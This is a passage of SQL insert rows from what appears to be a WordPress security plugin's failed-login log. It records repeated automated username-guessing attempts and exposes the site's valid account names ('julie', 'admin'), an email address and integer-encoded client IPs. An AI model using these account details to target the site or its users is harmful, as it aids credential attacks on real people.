(99895, 1493671338.260997, 1, 'loginFailValidUsername', 'julie', 2, 3195004720, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99896, 1493702146.011968, 1, 'loginFailValidUsername', 'admin', 1, 701148681, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99897, 1493702333.036758, 1, 'loginFailInvalidUsername', 'namur', 0, 773229120, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99898, 1493805430.592544, 1, 'loginFailInvalidUsername', 'namur', 0, 1571457074, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99899, 1493805944.905122, 1, 'loginFailInvalidUsername', 'testuser', 0, 794450239, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99900, 1493806833.266184, 1, 'loginFailValidUsername', 'julie', 2, 3326600728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99901, 1493806977.416967, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3644686526, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99902, 1493895021.286080, 1, 'loginFailValidUsername', 'admin', 1, 2249451015, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99903, 1493945486.515088, 1, 'loginFailInvalidUsername', 'pour', 0, 3497113801, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99904, 1493945943.289898, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99905, 1493945945.142394, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99906, 1493945946.968033, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99907, 1493945948.794980, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99908, 1493945950.609365, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99909, 1493945952.586529, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99910, 1493945954.730453, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99911, 1493945956.532300, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99912, 1493945958.638293, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99913, 1493945960.474289, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99914, 1493947695.484293, 1, 'loginFailInvalidUsername', 'guest', 0, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99915, 1493948313.146611, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99916, 1493948314.958927, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99917, 1493948316.814452, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99918, 1493948318.633935, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99919, 1493948320.503892, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99920, 1493948322.349791, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99921, 1493948324.236955, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99922, 1493948326.058696, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99923, 1493948327.893002, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99924, 1493948329.881646, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99925, 1493949432.256547, 1, 'loginFailInvalidUsername', 'root', 0, 3497110456, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99926, 1493949613.961594, 1, 'loginFailInvalidUsername', 'cross@cross', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99927, 1493949630.089184, 1, 'loginFailInvalidUsername', 'objectifs@objectifs', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99928, 1493949636.261092, 1, 'loginFailInvalidUsername', 'venez@venez', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99929, 1493949648.749821, 1, 'loginFailInvalidUsername', 'outils@outils', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99930, 1493949661.031952, 1, 'loginFailInvalidUsername', 'professionnel@professionnel', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99931, 1493949669.153464, 1, 'loginFailInvalidUsername', 'travail@travail', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99932, 1493949680.864752, 1, 'loginFailInvalidUsername', 'namur@namur', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99933, 1493949686.179243, 1, 'loginFailInvalidUsername', 'center@center', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99934, 1493949689.494672, 1, 'loginFailInvalidUsername', 'test', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99935, 1493949694.675891, 1, 'loginFailInvalidUsername', 'support', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99936, 1493950762.081550, 1, 'loginFailInvalidUsername', 'support', 0, 3590043250, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99937, 1493951328.746234, 1, 'loginFailInvalidUsername', 'support', 0, 3191614634, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99938, 1493973957.096794, 1, 'loginFailValidUsername', 'admin', 1, 1600667040, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99939, 1493992796.583886, 1, 'loginFailValidUsername', 'julie', 2, 1589499159, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.4.0522.5894 Safari/534.54 OPR/40.6.1345.6617'),
(99940, 1493994800.586596, 1, 'loginFailValidUsername', 'julie', 2, 2033590441, 'Mozilla/5.0 (Windows NT 6.1; Win64) AppleWebKit/530.64.01 (KHTML, like Gecko) Chrome/55.0.5267.0995 Safari/531.94 OPR/41.9.3544.8272'),
(99941, 1494002864.051431, 1, 'loginFailValidUsername', 'julie', 2, 2016970575, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.07.55 (KHTML, like Gecko) Chrome/57.5.9664.4392 Safari/534.47'),
(99942, 1494006809.381142, 1, 'loginFailValidUsername', 'julie', 2, 1548974815, 'Mozilla/5.0 (Windows NT 5.0; rv:52.58.05) Gecko/20146722 Firefox/52.58.05'),
(99943, 1494010854.621775, 1, 'loginFailValidUsername', 'julie', 2, 702326185, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.85.48 (KHTML, like Gecko) Chrome/57.4.9773.4945 Safari/534.55 OPR/44.5.1496.6768'),
(99944, 1494014792.131617, 1, 'loginFailValidUsername', 'julie', 2, 1532715696, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_36_89) AppleWebKit/532.84.47 (KHTML, like Gecko) Chrome/57.4.9600.5972 Safari/534.55'),
(99945, 1494018751.390312, 1, 'loginFailValidUsername', 'julie', 2, 2805765009, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.06.53 (KHTML, like Gecko) Chrome/57.5.9435.4163 Safari/534.45'),
(99946, 1494022803.121670, 1, 'loginFailValidUsername', 'julie', 2, 694202782, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.99.42 (KHTML, like Gecko) Chrome/57.5.0107.5470 Safari/530.60 OPR/40.6.1920.7292'),
(99947, 1494026894.096061, 1, 'loginFailValidUsername', 'julie', 2, 2955886216, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.66.13 (KHTML, like Gecko) Chrome/55.1.6455.0183 Safari/532.05 OPR/42.9.4632.9360'),
(99948, 1494031052.753435, 1, 'loginFailValidUsername', 'julie', 2, 3306890834, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.37.80 (KHTML, like Gecko) Chrome/54.9.4900.9272 Safari/531.98'),
(99949, 1494035509.750622, 1, 'loginFailValidUsername', 'julie', 2, 831990947, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_33_80) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.1.6278.1906 Safari/532.04 Edge/36.08284'),
(99950, 1494041690.510045, 1, 'loginFailValidUsername', 'julie', 2, 3413169274, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_39_86) AppleWebKit/531.71.28 (KHTML, like Gecko) Chrome/56.2.7932.1660 Safari/532.10 Edge/36.04817'),
(99951, 1494047804.079579, 1, 'loginFailValidUsername', 'julie', 2, 702812100, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.6.1 Safari/532.14'),
(99952, 1494052318.006676, 1, 'loginFailInvalidUsername', 'demo', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99953, 1494052336.261675, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99954, 1494052347.011154, 1, 'loginFailInvalidUsername', 'master', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99955, 1494052347.513118, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99956, 1494052391.552821, 1, 'loginFailInvalidUsername', 'blog', 0, 3346287710, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99957, 1494053830.245488, 1, 'loginFailValidUsername', 'julie', 2, 1588883723, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.27.80 (KHTML, like Gecko) Chrome/54.8.3947.8219 Safari/531.98'),
(99958, 1494059841.816972, 1, 'loginFailValidUsername', 'julie', 2, 3177270844, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.83.36 (KHTML, like Gecko) Chrome/57.4.9536.4808 Safari/534.54 OPR/44.5.0359.6621'),
(99959, 1494060818.352423, 1, 'loginFailInvalidUsername', 'master', 0, 1632245985, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99960, 1494060819.778019, 1, 'loginFailInvalidUsername', 'blog', 0, 3353828771, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99961, 1494060861.286516, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1547660374, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99962, 1494060884.306772, 1, 'loginFailInvalidUsername', 'manager', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99963, 1494061427.092413, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99964, 1494071427.235854, 1, 'loginFailValidUsername', 'julie', 2, 783298999, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.14.67 (KHTML, like Gecko) Version/4.6.1 Safari/533.22'),
(99965, 1494072414.449278, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99966, 1494072431.505111, 1, 'loginFailInvalidUsername', 'master', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99967, 1494072575.157223, 1, 'loginFailInvalidUsername', 'blog', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99968, 1494072602.703868, 1, 'loginFailInvalidUsername', 'manager', 0, 469651732, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99969, 1494072996.797938, 1, 'loginFailInvalidUsername', 'DEMO', 0, 469651732, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99970, 1494073769.339412, 1, 'loginFailInvalidUsername', 'master', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99971, 1494073909.463161, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99972, 1494082816.533915, 1, 'loginFailValidUsername', 'julie', 2, 736524348, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.15.62 (KHTML, like Gecko) Chrome/53.6.0353.5081 Safari/534.54'),
(99973, 1494084435.908980, 1, 'loginFailInvalidUsername', 'administrador', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99974, 1494084518.839375, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99975, 1494084554.702483, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3353828771, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99976, 1494084555.817356, 1, 'loginFailInvalidUsername', 'DEMO', 0, 843039290, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99977, 1494084556.105502, 1, 'loginFailInvalidUsername', 'DEMO', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99978, 1494084556.107845, 1, 'loginFailInvalidUsername', 'DEMO', 0, 633031051, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99979, 1494084559.957282, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99980, 1494084560.176516, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1728523225, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99981, 1494084560.434888, 1, 'loginFailInvalidUsername', 'DEMO', 0, 2655384544, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99982, 1494084572.357210, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1729883369, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99983, 1494084889.689943, 1, 'loginFailInvalidUsername', 'demo', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99984, 1494084893.804751, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3098024844, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99985, 1494084900.596664, 1, 'loginFailInvalidUsername', 'blog', 0, 1632276610, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99986, 1494087976.585326, 1, 'loginFailInvalidUsername', 'support', 0, 3237666864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99987, 1494088406.964566, 1, 'loginFailValidUsername', 'julie', 2, 2631043064, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.11 (KHTML, like Gecko) Chrome/55.1.6297.1925 Safari/532.03 OPR/42.0.4574.9202'),
(99988, 1494093909.450334, 1, 'loginFailValidUsername', 'julie', 2, 1835647128, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.62.19 (KHTML, like Gecko) Chrome/55.1.6017.0745 Safari/532.01 OPR/42.9.4394.9022'),
(99989, 1494100230.683549, 1, 'loginFailInvalidUsername', 'superadmin', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99990, 1494100234.433749, 1, 'loginFailInvalidUsername', 'blog', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99991, 1494100238.353071, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2111103174, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99992, 1494100303.376554, 1, 'loginFailInvalidUsername', 'manager', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99993, 1494102644.458298, 1, 'loginFailInvalidUsername', 'superadmin', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99994, 1494110570.355255, 1, 'loginFailValidUsername', 'julie', 2, 1776344316, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_41_94) AppleWebKit/533.09.52 (KHTML, like Gecko) Chrome/57.5.1159.6421 Safari/530.60 Edge/34.76004'),
(99995, 1494116196.474691, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3098029782, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99996, 1494116197.767935, 1, 'loginFailInvalidUsername', 'master', 0, 3098024846, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99997, 1494116208.549576, 1, 'loginFailInvalidUsername', 'manager', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99998, 1494116335.172593, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3346287710, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99999, 1494116344.265542, 1, 'loginFailInvalidUsername', 'blog', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100000, 1494119049.698186, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100001, 1494122500.296181, 1, 'loginFailValidUsername', 'julie', 2, 3176824475, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.25.78 (KHTML, like Gecko) Chrome/54.8.3701.8073 Safari/531.96'),
(100002, 1494128708.762605, 1, 'loginFailValidUsername', 'julie', 2, 1429722213, 'Mozilla/5.0 (Windows NT 6.0; rv:45.67.14) Gecko/20155554 Firefox/45.67.14'),
(100003, 1494133332.100216, 1, 'loginFailInvalidUsername', 'demo', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100004, 1494133399.840991, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1893028934, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100005, 1494134009.173818, 1, 'loginFailInvalidUsername', 'wordpress', 0, 633031051, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100006, 1494134024.812388, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100007, 1494134108.280197, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1743622318, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100008, 1494134132.271488, 1, 'loginFailInvalidUsername', 'blog', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100009, 1494134870.004371, 1, 'loginFailValidUsername', 'julie', 2, 1589189838, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9934.4662 Safari/534.40'),
(100010, 1494135260.069257, 1, 'loginFailInvalidUsername', 'DEMO', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100011, 1494140532.325843, 1, 'loginFailValidUsername', 'admin', 1, 2249451241, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100012, 1494147061.155588, 1, 'loginFailValidUsername', 'julie', 2, 762636554, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_43_96) AppleWebKit/533.92.45 (KHTML, like Gecko) Chrome/57.5.0488.5750 Safari/530.63 Edge/34.69383'),
(100013, 1494149308.834807, 1, 'loginFailInvalidUsername', 'superadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100014, 1494149331.095185, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2996829330, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100015, 1494150065.787566, 1, 'loginFailInvalidUsername', 'manager', 0, 3098024781, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100016, 1494152889.648181, 1, 'loginFailValidUsername', 'julie', 2, 3004752202, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_33_80) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.2.7373.1001 Safari/532.14 Edge/36.08222'),
(100017, 1494158601.121114, 1, 'loginFailValidUsername', 'julie', 2, 1335791119, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_39_82) AppleWebKit/532.98.41 (KHTML, like Gecko) Chrome/57.5.0087.5359 Safari/534.59 Edge/34.65377'),
(100018, 1494164213.416752, 1, 'loginFailValidUsername', 'julie', 2, 2374659752, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.22.75 (KHTML, like Gecko) Chrome/54.8.3428.8790 Safari/531.92'),
(100019, 1494167247.364136, 1, 'loginFailInvalidUsername', 'master', 0, 1053997316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100020, 1494167247.573479, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100021, 1494167251.769648, 1, 'loginFailInvalidUsername', 'manager', 0, 3056763559, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100022, 1494167288.759360, 1, 'loginFailInvalidUsername', 'blog', 0, 3098029701, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100023, 1494167359.551169, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100024, 1494167956.003882, 1, 'loginFailInvalidUsername', 'manager', 0, 2202594575, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100025, 1494169647.123884, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2996829330, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100026, 1494169790.128681, 1, 'loginFailValidUsername', 'julie', 2, 3035978418, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.13.76 (KHTML, like Gecko) Chrome/53.7.2578.8840 Safari/531.84'),
(100027, 1494171372.331679, 1, 'loginFailInvalidUsername', 'master', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100028, 1494173321.818524, 1, 'loginFailInvalidUsername', 'admin@crosstrainingcenter.be', 0, 3191614634, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100029, 1494173771.118805, 1, 'loginFailValidUsername', 'julie', 2, 3398341290, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_24_71) AppleWebKit/531.75.22 (KHTML, like Gecko) Chrome/55.1.6411.1149 Safari/532.05 Edge/36.09608'),
(100030, 1494173862.945451, 1, 'loginFailInvalidUsername', 'tester', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100031, 1494174197.959115, 1, 'loginFailInvalidUsername', 'tester', 0, 1279978460, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100032, 1494174663.862391, 1, 'loginFailInvalidUsername', 'notre', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100033, 1494181869.152854, 1, 'loginFailValidUsername', 'julie', 2, 2684304397, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.29.72 (KHTML, like Gecko) Chrome/54.8.3111.8483 Safari/531.90'),
